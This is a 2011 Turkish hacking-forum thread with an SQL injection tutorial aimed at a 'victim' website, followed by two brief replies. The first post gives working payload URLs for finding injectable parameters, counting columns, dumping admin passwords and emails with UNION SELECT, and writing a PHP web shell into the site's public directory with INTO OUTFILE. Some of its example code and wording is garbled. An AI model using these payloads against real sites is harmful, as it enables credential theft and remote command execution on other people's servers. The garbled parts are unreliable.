İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

MySQL Enjeksiyon iLE HACK

19-09-2011 11:57
#1
By Bouncer - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2011
Nereden:
Avrupa
Mesajlar:
322
Teşekkür (Etti):
0
Teşekkür (Aldı):
100
Konular:
32
Ticaret:
(0) %
MySQL Enjeksiyon Ve Temel Bilgileri

MySQL Enjeksiyon Bize ne verebilir:

Kurbanın Sitesinde ki Tüm Bilgileri Elegecirmemize Yardım Ve Yataklık Eder..
Bu güvenlik açığı, Kurbanın Sunucusunda Keyfi Komut Çalıstırmamıza Olanak Sağlıyor;
MySQL Enjeksiyon İle Kurbanın Belirli Şartlar Altında Tum Bilgileri Silebiliriz

Örneğin;


<?php
...
$id = $_GET [ ’id’ ];
...
mysql_query ( "UNION SELECT nick FROM users WHERE id=" . $id );.....
?>



Bir Kodumuz Var.


Yani, ayrıntılı olarak nevdavayas, sorgu değişkeni, script GET yöntemi sonucu yerine olmasıdır. Şimdi php kod baktığımızda, biz kendi lehimize sorguyu değiştirebilirsiniz

Bu değişken de hiçbir filtre yok,Kendi Sorgumuzu Yabiliriz

Pratik olalım;


MySQL inj bulmak için?

Bu örneği ele alalım:

http://www.site.com/index.php?page=1


Sonuna (’) koyarak Hata olusturabiliriz..


http://www.site.com/index.php?page=1 ’

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’\\’’ at line 1


Bir hata alabiliriz

-------------------------------------------------------------------------------------------

İkinci Yontem Olarak [’]yerine -1 -2 -3 gibi sayılar koyarak hata verdiririz

Örneğin ;


http://www.site.com/index.php?page=2-1 verdirdigimizde deneme geliyorsa ve index.php?page=2-2 baska bir yazı geliyorsa .%99 ihtimalle acık vardır

Acık Bulmayı Ögrendik Şimdide Column Sayısını Bulmayı Öğrenelim


http://www.site.com/index.php?page=2+order+by+1,2,3--

gibi komutla hata verene kadar sayıları tekrarlarız

Simdide kullanıcıların şifresini email almayı gösterelim


http://www.site.com/index.php?page=2...ass+from+admin

gibi

Şimdide Mysql Shell Olusturalım


’<?php system($_GET[cmd]); ?>’+from+mysql.user+into+outfile+’/home/site/public_html/shell.php’/*

http://www.site.com/index.php?page=-1+union+select+1,2,3,4,5,’<?php system($_GET[cmd]); ?>’+from+mysql.user+into+outfile+’/home/site/public_html/shell.php’/*

19-09-2011 13:16
#2
PcChoLik - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2011
Nereden:
İstanbul
Yaş:
26
Mesajlar:
1.597
Teşekkür (Etti):
142
Teşekkür (Aldı):
752
Konular:
115
Ticaret:
(0) %
sağolda bunu yenilerin anlıycanı sanmam
19-09-2011 13:28
#3
By Bouncer - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2011
Nereden:
Avrupa
Mesajlar:
322
Teşekkür (Etti):
0
Teşekkür (Aldı):
100
Konular:
32
Ticaret:
(0) %
Önceki Paylaştığım Konulara Baksalar Öğrenirler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı